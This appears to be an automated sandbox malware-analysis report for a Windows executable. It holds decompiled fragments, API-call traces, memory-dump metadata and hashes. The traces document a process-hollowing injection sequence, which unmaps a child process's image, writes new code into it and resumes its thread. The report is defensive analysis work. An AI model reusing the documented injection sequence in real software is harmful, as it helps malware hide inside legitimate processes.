                                                                                                    					E00401558(_t18, _t14,  *((intOrPtr*)(_t30 - 4)),  *((intOrPtr*)(_t30 + 0x14))); // executed
                                                                                                    				}
                                                                                                    				 *_t18(0xffffffff, 0);
                                                                                                    				_t16 = 0x1986;
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(_t26, _t39);
                                                                                                    				return _t16;
                                                                                                    			}








                                                                                                    0x0040193d
                                                                                                    0x00401940
                                                                                                    0x00401942
                                                                                                    0x00401942
                                                                                                    0x00401942
                                                                                                    0x00401943
                                                                                                    0x0040195b
                                                                                                    0x0040196f
                                                                                                    0x00401981
                                                                                                    0x00401986
                                                                                                    0x0040198e
                                                                                                    0x00401994
                                                                                                    0x00401995
                                                                                                    0x00401998
                                                                                                    0x0040199b
                                                                                                    0x0040199c
                                                                                                    0x004019a1
                                                                                                    0x004019a3
                                                                                                    0x004019ad
                                                                                                    0x004019ad
                                                                                                    0x004019b6
                                                                                                    0x004019c2
                                                                                                    0x004019cf
                                                                                                    0x004019e1
                                                                                                    0x004019ee
                                                                                                    0x004019f7

                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                                      • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                      • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 4152845823-0
                                                                                                    • Opcode ID: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
                                                                                                    • Instruction ID: 515f5f5985279033342f6d13e0d75d2e799464d7355665022411b06cc3c0c42c
                                                                                                    • Opcode Fuzzy Hash: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
                                                                                                    • Instruction Fuzzy Hash: 991129F2608285EBD7005BA18DA2EA937659F01710F20057BF6037E0F2D53D9513EB1B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 25%
                                                                                                    			E0040196C(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                    				void* _t9;
                                                                                                    				void* _t11;
                                                                                                    				intOrPtr* _t13;
                                                                                                    				void* _t23;
                                                                                                    
                                                                                                    				_t19 = __edi;
                                                                                                    				_pop(es);
                                                                                                    				asm("sbb bh, [eax+ebp*2]");
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(__edi, __eflags);
                                                                                                    				_t13 =  *((intOrPtr*)(_t23 + 8));
                                                                                                    				Sleep(0x1388);
                                                                                                    				_push(_t23 - 4);
                                                                                                    				_push( *((intOrPtr*)(_t23 + 0x10)));
                                                                                                    				_push( *((intOrPtr*)(_t23 + 0xc)));
                                                                                                    				_push(_t13); // executed
                                                                                                    				_t9 = L00401467(__edi, __esi); // executed
                                                                                                    				_t29 = _t9;
                                                                                                    				if(_t9 != 0) {
                                                                                                    					E00401558(_t13, _t9,  *((intOrPtr*)(_t23 - 4)),  *((intOrPtr*)(_t23 + 0x14))); // executed
                                                                                                    				}
                                                                                                    				 *_t13(0xffffffff, 0);
                                                                                                    				_t11 = 0x1986;
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(_t19, _t29);
                                                                                                    				return _t11;
                                                                                                    			}







                                                                                                    0x0040196c
                                                                                                    0x0040196c
                                                                                                    0x0040196d
                                                                                                    0x0040196f
                                                                                                    0x00401981
                                                                                                    0x00401986
                                                                                                    0x0040198e
                                                                                                    0x00401994
                                                                                                    0x00401995
                                                                                                    0x00401998
                                                                                                    0x0040199b
                                                                                                    0x0040199c
                                                                                                    0x004019a1
                                                                                                    0x004019a3
                                                                                                    0x004019ad
                                                                                                    0x004019ad
                                                                                                    0x004019b6
                                                                                                    0x004019c2
                                                                                                    0x004019cf
                                                                                                    0x004019e1
                                                                                                    0x004019ee
                                                                                                    0x004019f7

                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                                      • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                      • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 4152845823-0
                                                                                                    • Opcode ID: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
                                                                                                    • Instruction ID: 3e47f40c2c79a3419effdd93610d16f961f2ccd470e9348de27537ec9d0296a5
                                                                                                    • Opcode Fuzzy Hash: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
                                                                                                    • Instruction Fuzzy Hash: CA01F2B2208244EFCB005BE58CA1EAA3765AB05315F300133F603B90F2C93C8512EB6B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 01E671CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.632080495.0000000001E61000.00000040.00000020.00020000.00000000.sdmp, Offset: 01E61000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1e61000_uwjrhss.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction ID: 3bb27ab3709db03ab3dc960050da6283cabb535c1fddf136ae623c2f1bde6bb4
                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction Fuzzy Hash: E9112879A40208EFDB01DF98C985E98BFF5AF08750F5580A5FA489B361D371EA90DF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.632080495.0000000001E61000.00000040.00000020.00020000.00000000.sdmp, Offset: 01E61000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1e61000_uwjrhss.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                    • Instruction ID: 779f438c0dccc49ed1fb34f20167aa3d59250631df76d05e871613910b5c8e96
                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                    • Instruction Fuzzy Hash: 3C11CEB2390101AFDB40DF59DCC0EAA73EEEB9C260B598069ED04CB301E675E842C760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631209093.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_409000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                    • String ID:
                                                                                                    • API String ID: 3016257755-0
                                                                                                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                    • Instruction ID: 853c7cfb1190d9a4bf9bc135105965c99ead5257da515fb9699fb845fd635cdd
                                                                                                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                    • Instruction Fuzzy Hash: 1B11833201014EFBCF125F95DC41CEE3F22BB18354B188626FE5869171C33AC971AB85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.5%
                                                                                                    Dynamic/Decrypted Code Coverage:85.7%
                                                                                                    Signature Coverage:35.7%
                                                                                                    Total number of Nodes:42
                                                                                                    Total number of Limit Nodes:8
                                                                                                    execution_graph 15225 3920630 15226 392064c 15225->15226 15228 3921577 15226->15228 15231 39205b0 15228->15231 15235 39205dc 15231->15235 15232 39205e2 GetFileAttributesA 15232->15235 15233 392061e 15235->15232 15235->15233 15236 3920420 15235->15236 15237 39204f3 15236->15237 15238 39204fa 15237->15238 15239 39204ff CreateWindowExA 15237->15239 15238->15235 15239->15238 15240 3920540 PostMessageA 15239->15240 15241 392055f 15240->15241 15241->15238 15243 3920110 VirtualAlloc GetModuleFileNameA 15241->15243 15244 3920414 15243->15244 15245 392017d CreateProcessA 15243->15245 15244->15241 15245->15244 15247 392025f VirtualFree VirtualAlloc GetThreadContext 15245->15247 15247->15244 15248 39202a9 ReadProcessMemory 15247->15248 15249 39202e5 VirtualAllocEx NtWriteVirtualMemory 15248->15249 15250 39202d5 NtUnmapViewOfSection 15248->15250 15251 392033b 15249->15251 15250->15249 15252 3920350 NtWriteVirtualMemory 15251->15252 15253 392039d WriteProcessMemory SetThreadContext ResumeThread 15251->15253 15252->15251 15254 39203fb ExitProcess 15253->15254 15256 388a026 15257 388a035 15256->15257 15260 388a7c6 15257->15260 15265 388a7e1 15260->15265 15261 388a7ea CreateToolhelp32Snapshot 15262 388a806 Module32First 15261->15262 15261->15265 15263 388a815 15262->15263 15266 388a03e 15262->15266 15267 388a485 15263->15267 15265->15261 15265->15262 15268 388a4b0 15267->15268 15269 388a4f9 15268->15269 15270 388a4c1 VirtualAlloc 15268->15270 15269->15269 15270->15269 15271 40541f 15274 408861 15271->15274 15273 405424 15273->15273 15275 408893 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 15274->15275 15276 408886 15274->15276 15277 40888a 15275->15277 15276->15275 15276->15277 15277->15273

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 03920156
                                                                                                    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0392016C
                                                                                                    • CreateProcessA.KERNELBASE(?,00000000), ref: 03920255
                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03920270
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03920283
                                                                                                    • GetThreadContext.KERNELBASE(00000000,?), ref: 0392029F
                                                                                                    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 039202C8
                                                                                                    • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 039202E3
                                                                                                    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 03920304
                                                                                                    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0392032A
                                                                                                    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 03920399
                                                                                                    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 039203BF
                                                                                                    • SetThreadContext.KERNELBASE(00000000,?), ref: 039203E1
                                                                                                    • ResumeThread.KERNELBASE(00000000), ref: 039203ED
                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 03920412
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                    • String ID:
                                                                                                    • API String ID: 2875986403-0
                                                                                                    • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                    • Instruction ID: 68b7e2b14614a9e37a6640058cc1c84f415be89590526317ab90823c65d12f1a
                                                                                                    • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                    • Instruction Fuzzy Hash: FBB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB395D771AE45CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 15 3920420-39204f8 17 39204fa 15->17 18 39204ff-392053c CreateWindowExA 15->18 19 39205aa-39205ad 17->19 20 3920540-3920558 PostMessageA 18->20 21 392053e 18->21 22 392055f-3920563 20->22 21->19 22->19 23 3920565-3920579 22->23 23->19 25 392057b-3920582 23->25 26 3920584-3920588 25->26 27 39205a8 25->27 26->27 28 392058a-3920591 26->28 27->22 28->27 29 3920593-3920597 call 3920110 28->29 31 392059c-39205a5 29->31 31->27
                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 03920533
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                    • API String ID: 716092398-2341455598
                                                                                                    • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                    • Instruction ID: f5e076e5e312a5972ff87899ec3193aaab3a64bd8c655bed725713ee521bfa3d
                                                                                                    • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                    • Instruction Fuzzy Hash: AB510A70D08788DEEB11CB98C849BDDBFB66F11708F144058D5447F28AC3BA5558CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 32 39205b0-39205d5 33 39205dc-39205e0 32->33 34 39205e2-39205f5 GetFileAttributesA 33->34 35 392061e-3920621 33->35 36 3920613-392061c 34->36 37 39205f7-39205fe 34->37 36->33 37->36 38 3920600-392060b call 3920420 37->38 40 3920610 38->40 40->36
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 039205EC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID: apfHQ$o
                                                                                                    • API String ID: 3188754299-2999369273
                                                                                                    • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                    • Instruction ID: ddd7a349e01cf36b76eb935d1ec2f4ccd026662003ce5c2f9278f5ede66295a1
                                                                                                    • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                    • Instruction Fuzzy Hash: E1011E70C0425CEEDF10DB98C5587AEFFB5AF41308F188199C4092B345D7B69B58CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 41 388a7c6-388a7df 42 388a7e1-388a7e3 41->42 43 388a7ea-388a7f6 CreateToolhelp32Snapshot 42->43 44 388a7e5 42->44 45 388a7f8-388a7fe 43->45 46 388a806-388a813 Module32First 43->46 44->43 45->46 51 388a800-388a804 45->51 47 388a81c-388a824 46->47 48 388a815-388a816 call 388a485 46->48 52 388a81b 48->52 51->42 51->46 52->47
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0388A7EE
                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0388A80E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.630815877.000000000388A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0388A000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_388a000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3833638111-0
                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction ID: f9aa0a3a5bbf04e6284d4f4b205e9ab9fa99ad97004c34c83b5ff34e78cffec9
                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction Fuzzy Hash: 78F0F6312003106FD724BBF8A88CB6EB6FCEF48725F1405AAE642D10C0CBB4E8468661
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 54 388a485-388a4bf call 388a798 57 388a50d 54->57 58 388a4c1-388a4f4 VirtualAlloc call 388a512 54->58 57->57 60 388a4f9-388a50b 58->60 60->57
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0388A4D6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.630815877.000000000388A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0388A000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_388a000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction ID: 442ec1c087d2405fbf98d1e3b4634f9ded2c2356170b307d4971d220aa88c7fc
                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction Fuzzy Hash: B4113F79A00208EFDB01DF98C985E99BBF5AF08350F058095F9489B361D375EA90DF80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.630815877.000000000388A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0388A000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_388a000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                    • Instruction ID: cd99db7ba4f3f6a1d06515c48f19be9ee3dbef3798661d39a7d0c24e517d7ff7
                                                                                                    • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                    • Instruction Fuzzy Hash: 3B3149398062859FCB16EFB4D891AB5FB70EF87324F1999DDC481CB116D326A047C794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 297 3943f16-3943f2f 298 3943f31-3943f3b call 3945ba8 call 3944c72 297->298 299 3943f49-3943f5e call 394bdc0 297->299 306 3943f40 298->306 299->298 305 3943f60-3943f63 299->305 307 3943f65 305->307 308 3943f77-3943f7d 305->308 311 3943f42-3943f48 306->311 312 3943f67-3943f69 307->312 313 3943f6b-3943f75 call 3945ba8 307->313 309 3943f7f 308->309 310 3943f89-3943f9a call 3950504 call 39501a3 308->310 309->313 314 3943f81-3943f87 309->314 321 3944185-394418f call 3944c9d 310->321 322 3943fa0-3943fac call 39501cd 310->322 312->308 312->313 313->306 314->310 314->313 322->321 327 3943fb2-3943fbe call 39501f7 322->327 327->321 330 3943fc4-3943fcb 327->330 331 3943fcd 330->331 332 394403b-3944046 call 39502d9 330->332 333 3943fd7-3943ff3 call 39502d9 331->333 334 3943fcf-3943fd5 331->334 332->311 338 394404c-394404f 332->338 333->311 342 3943ff9-3943ffc 333->342 334->332 334->333 340 3944051-394405a call 3950554 338->340 341 394407e-394408b 338->341 340->341 350 394405c-394407c 340->350 344 394408d-394409c call 3950f40 341->344 345 3944002-394400b call 3950554 342->345 346 394413e-3944140 342->346 353 394409e-39440a6 344->353 354 39440a9-39440d0 call 3950e90 call 3950f40 344->354 345->346 355 3944011-3944029 call 39502d9 345->355 346->311 350->344 353->354 363 39440d2-39440db 354->363 364 39440de-3944105 call 3950e90 call 3950f40 354->364 355->311 360 394402f-3944036 355->360 360->346 363->364 369 3944107-3944110 364->369 370 3944113-3944122 call 3950e90 364->370 369->370 373 3944124 370->373 374 394414f-3944168 370->374 377 3944126-3944128 373->377 378 394412a-3944138 373->378 375 394416a-3944183 374->375 376 394413b 374->376 375->346 376->346 377->378 379 3944145-3944147 377->379 378->376 379->346 380 3944149 379->380 380->374 381 394414b-394414d 380->381 381->346 381->374
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 03943F51
                                                                                                      • Part of subcall function 03945BA8: __getptd_noexit.LIBCMT ref: 03945BA8
                                                                                                    • __gmtime64_s.LIBCMT ref: 03943FEA
                                                                                                    • __gmtime64_s.LIBCMT ref: 03944020
                                                                                                    • __gmtime64_s.LIBCMT ref: 0394403D
                                                                                                    • __allrem.LIBCMT ref: 03944093
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039440AF
                                                                                                    • __allrem.LIBCMT ref: 039440C6
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039440E4
                                                                                                    • __allrem.LIBCMT ref: 039440FB
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03944119
                                                                                                    • __invoke_watson.LIBCMT ref: 0394418A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 384356119-0
                                                                                                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                    • Instruction ID: 10d1075a51cf7ac0cb4fd78822f4953abe094254ab76f086895aafbd2cdc4248
                                                                                                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                    • Instruction Fuzzy Hash: 7D71F775A00716ABE724DE7ACC80F6AB3BDAF64364F184279F814DB680E770D9508BD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 382 39484ab-39484d9 call 3948477 387 39484f3-394850b call 394158d 382->387 388 39484db-39484de 382->388 394 3948524-394855a call 394158d * 3 387->394 395 394850d-394850f 387->395 390 39484e0-39484eb call 394158d 388->390 391 39484ed 388->391 390->388 390->391 391->387 407 394855c-3948562 394->407 408 394856b-394857e 394->408 397 3948511-394851c call 394158d 395->397 398 394851e 395->398 397->395 397->398 398->394 407->408 409 3948564-394856a call 394158d 407->409 413 3948580-3948587 call 394158d 408->413 414 394858d-3948594 408->414 409->408 413->414 416 3948596-394859d call 394158d 414->416 417 39485a3-39485ae 414->417 416->417 420 39485b0-39485bc 417->420 421 39485cb-39485cd 417->421 420->421 423 39485be-39485c5 call 394158d 420->423 423->421
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ExitProcess___crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 1022109855-0
                                                                                                    • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                    • Instruction ID: d3f497cc318eb4bcaba7cfcca1d9b8126eb7c5c755d31ff3097e6ea5a9fb7557
                                                                                                    • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                    • Instruction Fuzzy Hash: E431C335904350DFCB21EF14FC84C89B7A8FB54360708866BE9046B3B0CBB659C9AF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • std::exception::exception.LIBCMT ref: 0396FC1F
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0396FC34
                                                                                                    • std::exception::exception.LIBCMT ref: 0396FC4D
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0396FC62
                                                                                                    • std::regex_error::regex_error.LIBCPMT ref: 0396FC74
                                                                                                      • Part of subcall function 0396F914: std::exception::exception.LIBCMT ref: 0396F92E
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0396FC82
                                                                                                    • std::exception::exception.LIBCMT ref: 0396FC9B
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0396FCB0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
                                                                                                    • String ID: leM
                                                                                                    • API String ID: 2862078307-2926266777
                                                                                                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                    • Instruction ID: f851cdbc3b0348e322aa59bed4e8ef7815a9ead2f382c0d0c0ac4003557ec8a2
                                                                                                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                    • Instruction Fuzzy Hash: CF11BC79C0030DBBCF00FFA5E455DDDBB7CAA44344B508566BD149B641EB74A7888B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free_malloc_wprintf$_sprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 3721157643-0
                                                                                                    • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                    • Instruction ID: 8a3c75351399681a1fc6dc8b096d1f3dfd04e4447bdd5c9900789737e9628f7b
                                                                                                    • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
